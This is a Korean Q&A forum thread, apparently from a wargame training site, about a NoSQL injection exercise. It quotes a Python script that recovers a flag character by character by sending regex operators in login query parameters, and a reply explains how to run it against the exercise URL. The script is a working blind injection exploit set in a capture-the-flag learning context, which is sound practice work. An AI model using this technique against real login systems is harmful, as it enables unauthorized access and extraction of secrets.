완료됨
코드
답변 1 · 추천 0 · 조회 561
Exercise: NoSQL Injection

import requests, string
HOST = 'http://localhost'
ALPHANUMERIC = string.digits + string.ascii_letters
SUCCESS = 'admin'
flag = ''
for i in range(32):
for ch in ALPHANUMERIC:
response = requests.get(f'{HOST}/login?uid[regex]=ad.in&upw[regex]=D.{{{flag}{ch}')
if response.text == SUCCESS:
flag += ch
break
print(f'FLAG: DH{{{flag}}}')
이 코드는 어따 작성해야 하나요?
그리고 sql은 어디다가 입력해서 하는 공격인가요?

#웹해킹 #nosql #문제풀이
2023.06.17. 12:42
작성자 정보
더 깊이 있는 답변이 필요할 때
드림핵 팀과 멘토에게 직접 문의해 보세요!
Q&A Ticket 시작하기
답변 1
avatar
buaii
워게임 고인물

해당 코드는 python으로 작성하시면 됩니다.
HOST에 wargame url을 넣고 python코드를 실행시키면 결과가 출력됩니다

2023.06.20. 10:03